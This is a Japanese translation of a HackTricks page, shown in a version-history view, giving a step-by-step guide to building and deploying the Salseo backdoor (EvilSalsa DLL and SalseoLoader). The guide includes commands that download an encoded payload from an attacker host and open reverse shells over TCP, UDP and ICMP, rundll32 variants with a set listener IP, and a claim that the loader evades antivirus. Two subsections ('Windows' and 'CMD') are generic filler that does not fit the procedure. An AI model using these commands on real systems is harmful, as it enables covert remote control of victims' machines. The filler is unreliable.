hacktricks/backdoors/salseo.md

229 lines
14 KiB
Markdown
Raw Normal View History

2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 20:35:28 +02:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
2022-04-28 16:01:33 +00:00
</details>
2023-07-07 23:42:27 +00:00
## バイナリのコンパイル
2023-07-07 23:42:27 +00:00
githubからソースコードをダウンロードし、**EvilSalsa**と**SalseoLoader**をコンパイルします。コードをコンパイルするには**Visual Studio**が必要です。
2023-07-07 23:42:27 +00:00
これらのプロジェクトを、使用するWindowsボックスのアーキテクチャに合わせてコンパイルしてくださいWindowsがx64をサポートしている場合は、そのアーキテクチャにコンパイルします
2023-07-07 23:42:27 +00:00
Visual Studio内の**左側の"Build"タブ**の**"Platform Target"**でアーキテクチャを**選択**できます。
2023-07-07 23:42:27 +00:00
(\*\*このオプションが見つからない場合は、**"Project Tab"**を押し、次に**"\<Project Name> Properties"**を押します)
2022-08-10 14:32:58 +00:00
![](<../.gitbook/assets/image (132).png>)
2023-07-07 23:42:27 +00:00
次に、両方のプロジェクトをビルドしますBuild -> Build Solutionログ内に実行可能ファイルのパスが表示されます
2022-09-27 00:14:52 +00:00
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
2023-07-07 23:42:27 +00:00
## バックドアの準備
2023-07-07 23:42:27 +00:00
まず、**EvilSalsa.dll**をエンコードする必要があります。これを行うには、pythonスクリプト**encrypterassembly.py**を使用するか、プロジェクト**EncrypterAssembly**をコンパイルできます:
2022-08-04 20:47:35 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
2023-07-07 23:42:27 +00:00
Windowsは、最も一般的なオペレーティングシステムの1つであり、多くのバージョンが存在します。Windowsには、バックドアを作成するためのさまざまな方法があります。
#### リモートデスクトップ
リモートデスクトップRDPは、Windowsマシンにリモートでアクセスするための機能です。攻撃者は、有効な資格情報を使用してRDPに接続し、ターゲットマシンにアクセスすることができます。
#### バックドアアプリケーション
バックドアアプリケーションは、ターゲットマシンにインストールされたソフトウェアの一部として動作します。これにより、攻撃者はターゲットマシンにアクセスし、機密情報を盗むことができます。
#### サービスの改ざん
攻撃者は、Windowsサービスを改ざんすることでバックドアを作成することができます。これにより、攻撃者はターゲットマシンにアクセスし、システムの制御を取ることができます。
#### レジストリの改ざん
レジストリは、Windowsオペレーティングシステムの設定情報を格納するデータベースです。攻撃者は、レジストリを改ざんすることでバックドアを作成し、ターゲットマシンにアクセスすることができます。
#### ファイルの改ざん
攻撃者は、Windowsシステムファイルを改ざんすることでバックドアを作成することができます。これにより、攻撃者はターゲットマシンにアクセスし、システムを制御することができます。
#### プロセスの改ざん
攻撃者は、Windowsプロセスを改ざんすることでバックドアを作成することができます。これにより、攻撃者はターゲットマシンにアクセスし、システムを制御することができます。
#### ネットワークトラフィックの傍受
攻撃者は、ネットワークトラフィックを傍受することでバックドアを作成することができます。これにより、攻撃者はターゲットマシンにアクセスし、機密情報を盗むことができます。
#### プリインストールバックドア
プリインストールバックドアは、Windowsマシンに最初から組み込まれているバックドアです。これにより、攻撃者はターゲットマシンにアクセスし、システムを制御することができます。
#### ゼロデイエクスプロイト
ゼロデイエクスプロイトは、まだ修正されていないセキュリティの脆弱性を利用する攻撃手法です。攻撃者は、ゼロデイエクスプロイトを使用してWindowsマシンにバックドアを作成し、システムにアクセスすることができます。
#### パスワードのクラック
攻撃者は、パスワードのクラックを使用してWindowsマシンにアクセスすることができます。これにより、攻撃者はターゲットマシンにバックドアを作成し、システムを制御することができます。
以上が、Windowsでバックドアを作成するための一般的な方法です。これらの方法を理解し、対策を講じることが重要です。
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2023-07-07 23:42:27 +00:00
Ok、Salseoのすべてを実行するために必要なものが揃いました**エンコードされたEvilDalsa.dll**と**SalseoLoaderのバイナリ**。
2023-07-07 23:42:27 +00:00
**SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないはずです...**
2023-07-07 23:42:27 +00:00
## **バックドアの実行**
2023-07-07 23:42:27 +00:00
### **TCPリバースシェルの取得HTTPを介してエンコードされたdllをダウンロード**
2023-07-07 23:42:27 +00:00
リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
2023-07-07 23:42:27 +00:00
### **UDPリバースシェルの取得SMBを介してエンコードされたdllをダウンロード**
2023-07-07 23:42:27 +00:00
リバースシェルのリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバーimpacket-smbserverを起動することを忘れないでください。
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
2023-07-07 23:42:27 +00:00
### **ICMPリバースシェルの取得既に被害者内にエンコードされたdllが存在する場合**
2023-07-07 23:42:27 +00:00
**今回は、クライアント側でリバースシェルを受け取るための特別なツールが必要です。ダウンロードしてください:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
2023-07-07 23:42:27 +00:00
#### **ICMP応答の無効化**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2023-07-07 23:42:27 +00:00
#### クライアントの実行:
2023-07-07 23:42:27 +00:00
```bash
./client
```
2023-07-07 23:42:27 +00:00
クライアントを実行します。
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
2023-07-07 23:42:27 +00:00
#### ターゲット内部で、salseoの実行を行います
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
2023-07-07 23:42:27 +00:00
## DLLのエクスポートメイン関数としてSalseoLoaderをコンパイルする
2023-07-07 23:42:27 +00:00
Visual Studioを使用してSalseoLoaderプロジェクトを開きます。
2023-07-07 23:42:27 +00:00
### メイン関数の前に\[DllExport]を追加します。
![](<../.gitbook/assets/image (2) (1) (1) (1).png>)
2023-07-07 23:42:27 +00:00
### このプロジェクトにDllExportをインストールします。
2023-07-07 23:42:27 +00:00
#### **ツール** --> **NuGetパッケージマネージャー** --> **ソリューションのNuGetパッケージを管理...**
![](<../.gitbook/assets/image (3) (1) (1) (1) (1).png>)
2023-07-07 23:42:27 +00:00
#### **DllExportパッケージを検索しますブラウズタブを使用し、インストールを押しますポップアップを受け入れます**
![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>)
2023-07-07 23:42:27 +00:00
プロジェクトフォルダには、**DllExport.bat**と**DllExport\_Configure.bat**のファイルが表示されます。
2023-07-07 23:42:27 +00:00
### DllExportをアンインストールします。
2023-07-07 23:42:27 +00:00
**アンインストール**を押します(はい、奇妙ですが、信じてください、必要です)
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
2023-07-07 23:42:27 +00:00
### Visual Studioを終了し、DllExport\_configureを実行します。
2023-07-07 23:42:27 +00:00
Visual Studioを**終了**します。
2023-07-07 23:42:27 +00:00
次に、**SalseoLoaderフォルダ**に移動し、**DllExport\_Configure.bat**を実行します。
2023-07-07 23:42:27 +00:00
**x64**を選択しますx64ボックス内で使用する場合、私の場合はそうでした、**System.Runtime.InteropServices****DllExportの名前空間内**)を選択し、**Apply**を押します。
2023-02-27 09:14:27 +00:00
![](<../.gitbook/assets/image (7) (1) (1) (1).png>)
2023-07-07 23:42:27 +00:00
### Visual Studioでプロジェクトを再度開きます。
2023-07-07 23:42:27 +00:00
**\[DllExport]**はもはやエラーとしてマークされません。
![](<../.gitbook/assets/image (8) (1).png>)
2023-07-07 23:42:27 +00:00
### ソリューションをビルドします。
2023-07-07 23:42:27 +00:00
**出力の種類 = クラスライブラリ**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> アプリケーション --> 出力の種類 = クラスライブラリ)
2022-10-22 15:26:54 +00:00
![](<../.gitbook/assets/image (10) (1).png>)
2023-07-07 23:42:27 +00:00
**x64プラットフォーム**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> ビルド --> プラットフォームターゲット = x64
2022-09-02 15:27:38 +00:00
![](<../.gitbook/assets/image (9) (1) (1).png>)
2023-07-07 23:42:27 +00:00
ソリューションをビルドするには:ビルド --> ソリューションのビルド出力コンソールに新しいDLLのパスが表示されます
2023-07-07 23:42:27 +00:00
### 生成されたDLLをテストします。
2023-07-07 23:42:27 +00:00
テストしたい場所にDLLをコピーして貼り付けます。
2023-07-07 23:42:27 +00:00
実行するコマンド:
```
rundll32.exe SalseoLoader.dll,main
```
2023-07-07 23:42:27 +00:00
もしエラーが表示されなければ、おそらく機能するDLLを持っています
2023-07-07 23:42:27 +00:00
## DLLを使用してシェルを取得する
2023-07-07 23:42:27 +00:00
**HTTPサーバー**を使用して、**ncリスナー**を設定することを忘れないでください。
2022-08-04 20:47:35 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2023-07-07 23:42:27 +00:00
CMDコマンドプロンプトは、Windowsオペレーティングシステムで使用されるコマンドラインインターフェースです。CMDを使用すると、コマンドを入力してシステムの様々な操作を実行することができます。CMDは、システムの設定変更、ファイルの操作、ネットワークの設定など、さまざまなタスクを実行するために使用されます。CMDは、ハッカーにとっても便利なツールであり、システムの脆弱性を悪用するために使用されることもあります。ハッカーは、CMDを使用してバックドアを作成し、システムに不正アクセスすることができます。CMDは、ハッキングの技術の一部として広く使用されています。
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 20:35:28 +02:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝したい**ですか?または、**PEASSの最新バージョンにアクセスしたい**ですかまたは、HackTricksをPDFでダウンロードしたいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **ハッキングのトリックを共有する**には、[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
2022-04-28 16:01:33 +00:00
</details>